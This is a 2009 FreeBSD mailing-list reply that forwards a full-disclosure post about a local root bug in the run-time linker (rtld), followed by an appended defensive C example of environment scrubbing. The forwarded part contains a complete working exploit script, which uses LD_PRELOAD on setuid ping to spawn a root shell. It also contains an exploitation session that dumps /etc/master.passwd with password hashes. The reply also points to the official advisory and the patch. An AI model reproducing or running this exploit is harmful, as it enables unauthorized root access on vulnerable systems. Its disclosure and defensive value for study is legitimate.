Date: Tue, 1 Dec 2009 22:17:03 -0300
From: Daniel Molina Wegener <dmw@coder.cl>
To: freebsd-bugs@freebsd.org
Cc: jorge@betazeta.com
Subject: Re: Fwd: ** FreeBSD local r00t zeroday
Message-ID: <200912012217.09082.dmw@coder.cl>
In-Reply-To: <g2otzsukrypcwbems6UYAxe124vaj_firegpg@mail.gmail.com>
References: <g2otzsukrypcwbems6UYAxe124vaj_firegpg@mail.gmail.com>
On Tuesday 01 December 2009, jorge@betazeta.com wrote:
> I confirmed this.

Oh... I've seen this today at 09:20, sorry for the late answer,
I'm subscribed to the freebsd-hackers and freebsd-current mailing
lists ;)

------8<------
On Tue, Dec 01, 2009 at 06:04:05PM +0700, ~Lst wrote:
> Hello all,
>
> What d'you think about this ?
> http://seclists.org/fulldisclosure/2009/Nov/371

Are you actually asking for an opinion of a security hole, or are you
just trying to bring it to our attention?

An official statement was already issued to freebsd-security about
10 hours ago:

http://lists.freebsd.org/pipermail/freebsd-security/2009-December/005369.html

The mentioned patch is for src/libexec/rtld-elf/rtld.c (since full
paths aren't present in the patch file). Mentioned patch has already
been committed to the HEAD (CURRENT), RELENG_7, and RELENG_8 branches
approximately 8.75 hours ago, with the note "Advisory coming soon":

http://www.freebsd.org/cgi/cvsweb.cgi/src/libexec/rtld-elf/rtld.c
------8<------

>
> ---------- Forwarded message ----------
> From: Kingcope <kcope2@googlemail.com>
> Date: 2009/11/30
> Subject: ** FreeBSD local r00t zeroday
> To: full-disclosure@lists.grok.org.uk, bugtraq@securityfocus.com
>
>
> ** FreeBSD local r00t 0day
> Discovered & Exploited by Nikolaos Rangos also known as Kingcope.
> Nov 2009 "BiG TiME"
>
> "Go fetch your FreeBSD r00tkitz" //
> http://www.youtube.com/watch?v=dDnhthI27Fg
>
> There is an unbelievably simple local r00t bug in recent FreeBSD versions.
> I audited FreeBSD for local r00t bugs a long time *sigh*. Now it pays out.
>
> The bug resides in the Run-Time Link-Editor (rtld).
> Normally rtld does not allow dangerous environment variables like
> LD_PRELOAD to be set when executing setugid binaries like "ping" or "su".
> With a rather simple technique rtld can be tricked into
> accepting LD variables even on setugid binaries.
> See the attached exploit for details.
>
> Example exploiting session
> **********************************
> %uname -a;id;
> FreeBSD r00tbox.Belkin 8.0-RELEASE FreeBSD 8.0-RELEASE #0: Sat Nov 21
> 15:48:17 UTC 2009
> root@almeida.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC i386
> uid=1001(kcope) gid=1001(users) groups=1001(users)
> %./w00t.sh
> FreeBSD local r00t zeroday
> by Kingcope
> November 2009
> env.c: In function 'main':
> env.c:5: warning: incompatible implicit declaration of built-in
> function 'malloc'
> env.c:9: warning: incompatible implicit declaration of built-in
> function 'strcpy'
> env.c:11: warning: incompatible implicit declaration of built-in
> function 'execl'
> /libexec/ld-elf.so.1: environment corrupt; missing value for
> /libexec/ld-elf.so.1: environment corrupt; missing value for
> /libexec/ld-elf.so.1: environment corrupt; missing value for
> /libexec/ld-elf.so.1: environment corrupt; missing value for
> /libexec/ld-elf.so.1: environment corrupt; missing value for
> /libexec/ld-elf.so.1: environment corrupt; missing value for
> ALEX-ALEX
> # uname -a;id;
> FreeBSD r00tbox.Belkin 8.0-RELEASE FreeBSD 8.0-RELEASE #0: Sat Nov 21
> 15:48:17 UTC 2009
> root@almeida.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC i386
> uid=1001(kcope) gid=1001(users) euid=0(root) groups=1001(users)
> # cat /etc/master.passwd
> # $FreeBSD: src/etc/master.passwd,v 1.40.22.1.2.1 2009/10/25 01:10:29 kensmith Exp $
> #
> root:$1$AUbbHoOs$CCCsw7hsMB14KBkeS1xlz2:0:0::0:0:Charlie &:/root:/bin/csh
> toor:*:0:0::0:0:Bourne-again Superuser:/root:
> daemon:*:1:1::0:0:Owner of many system processes:/root:/usr/sbin/nologin
> operator:*:2:5::0:0:System &:/:/usr/sbin/nologin
> bin:*:3:7::0:0:Binaries Commands and Source:/:/usr/sbin/nologin
> tty:*:4:65533::0:0:Tty Sandbox:/:/usr/sbin/nologin
> kmem:*:5:65533::0:0:KMem Sandbox:/:/usr/sbin/nologin
> games:*:7:13::0:0:Games pseudo-user:/usr/games:/usr/sbin/nologin
> news:*:8:8::0:0:News Subsystem:/:/usr/sbin/nologin
> man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
> sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
> smmsp:*:25:25::0:0:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
> mailnull:*:26:26::0:0:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
> bind:*:53:53::0:0:Bind Sandbox:/:/usr/sbin/nologin
> proxy:*:62:62::0:0:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
> _pflogd:*:64:64::0:0:pflogd privsep user:/var/empty:/usr/sbin/nologin
> _dhcp:*:65:65::0:0:dhcp programs:/var/empty:/usr/sbin/nologin
> uucp:*:66:66::0:0:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
> pop:*:68:6::0:0:Post Office Owner:/nonexistent:/usr/sbin/nologin
> www:*:80:80::0:0:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
> nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/usr/sbin/nologin
> kcope:$1$u2wMkYLY$CCCuKax6dvYJrl2ZCYXA2:1001:1001::0:0:User &:/home/kcope:/bin/sh
> #
>
> Systems tested/affected
> **********************************
> FreeBSD 8.0-RELEASE *** VULNERABLE
> FreeBSD 7.1-RELEASE *** VULNERABLE
> FreeBSD 6.3-RELEASE *** NOT VULN
> FreeBSD 4.9-RELEASE *** NOT VULN
>
> *EXPLOIT*
>
> #!/bin/sh
> echo ** FreeBSD local r00t zeroday
> echo by Kingcope
> echo November 2009
> cat > env.c << _EOF
> #include <stdio.h>
>
> main() {
> extern char **environ;
> environ = (char**)malloc(8096);
>
> environ[0] = (char*)malloc(1024);
> environ[1] = (char*)malloc(1024);
> strcpy(environ[1],
> "LD_PRELOAD=/tmp/w00t.so.1.0");
>
> execl("/sbin/ping", "ping", 0);
> }
> _EOF
> gcc env.c -o env
> cat > program.c << _EOF
> #include <unistd.h>
> #include <stdio.h>
> #include <sys/types.h>
> #include <stdlib.h>
>
> void _init() {
> extern char **environ;
> environ=NULL;
> system("echo ALEX-ALEX;/bin/sh");
> }
> _EOF
> gcc -o program.o -c program.c -fPIC
> gcc -shared -Wl,-soname,w00t.so.1 -o w00t.so.1.0 program.o -nostartfiles
> cp w00t.so.1.0 /tmp/w00t.so.1.0
> ./env
>

Best regards,
-- 
| Daniel Molina Wegener <dmw [at] coder [dot] cl> |
| IT Consulting & Software Developer |
| http://coder.cl/ |
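The transcript above shows the defensive property at stake: a loader that scrubs LD_* variables for a setugid binary must finish the scrub even when the environment it is handed is malformed (the repeated "environment corrupt; missing value for" messages are followed by the preloaded library running anyway). The following C is an added illustration written for this archive page; it is not the FreeBSD rtld code, not the rtld.c patch referenced in the reply, and not anything from the forwarded message. The prefix list, the function names and the sample environment are constructed for the example.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical list of variable prefixes a loader must drop before
 * running a set-user-ID or set-group-ID program. The real set is
 * loader-specific; this one is an assumption for the example. */
static const char *const unsafe_prefixes[] = {
    "LD_PRELOAD=", "LD_LIBRARY_PATH=", "LD_LIBMAP=", NULL
};

/* A well-formed entry has a non-empty name followed by '='.
 * Anything else is the "environment corrupt" case. */
static int env_entry_wellformed(const char *entry)
{
    const char *eq = strchr(entry, '=');
    return eq != NULL && eq != entry;
}

/* True if the entry starts with one of the unsafe prefixes. */
static int env_entry_unsafe(const char *entry)
{
    for (size_t i = 0; unsafe_prefixes[i] != NULL; i++) {
        size_t n = strlen(unsafe_prefixes[i]);
        if (strncmp(entry, unsafe_prefixes[i], n) == 0)
            return 1;
    }
    return 0;
}

/* Scrub a NULL-terminated environment array in place for a privileged
 * process. Malformed entries and unsafe entries are both dropped, and the
 * loop never returns early, so a malformed entry placed ahead of
 * LD_PRELOAD cannot shield it. Returns the number of entries removed,
 * or -1 if envp is NULL. */
int scrub_env_for_setugid(char **envp)
{
    if (envp == NULL)
        return -1;
    size_t in = 0, out = 0;
    int removed = 0;
    for (; envp[in] != NULL; in++) {
        if (!env_entry_wellformed(envp[in]) || env_entry_unsafe(envp[in])) {
            removed++;
            continue;                 /* drop it, keep scanning */
        }
        envp[out++] = envp[in];       /* compact the surviving entries */
    }
    envp[out] = NULL;
    return removed;
}

/* Post-condition check a loader can run before trusting the environment:
 * returns 1 when no unsafe entry remains. */
int env_is_clean(char *const *envp)
{
    if (envp == NULL)
        return 1;
    for (size_t i = 0; envp[i] != NULL; i++)
        if (env_entry_unsafe(envp[i]))
            return 0;
    return 1;
}

/* Constructed sample environment mirroring the pattern in the transcript:
 * a valueless entry in slot 0, followed by LD_PRELOAD. The strings are
 * never modified; only the pointer array is compacted. */
char **build_sample_env(void)
{
    static char *sample[] = {
        "JUNKWITHOUTVALUE",               /* malformed: no '=' */
        "LD_PRELOAD=/tmp/example.so",     /* constructed, must be dropped */
        "HOME=/home/user",
        "PATH=/bin:/usr/bin",
        NULL
    };
    return sample;
}

int main(void)
{
    char **env = build_sample_env();
    printf("clean before scrub: %d\n", env_is_clean(env));
    int removed = scrub_env_for_setugid(env);
    printf("removed %d entries, clean after scrub: %d\n",
           removed, env_is_clean(env));
    for (size_t i = 0; env[i] != NULL; i++)
        printf("  kept: %s\n", env[i]);
    return env_is_clean(env) ? 0 : 1;
}
```

The design point is that the scrub treats "I could not parse this entry" and "this entry is dangerous" the same way: both are removed and the scan continues, so the outcome is independent of where the malformed entry sits. A loader that instead logged the corrupt entry and returned early would leave the later LD_PRELOAD in place, which is the behaviour the session above shows.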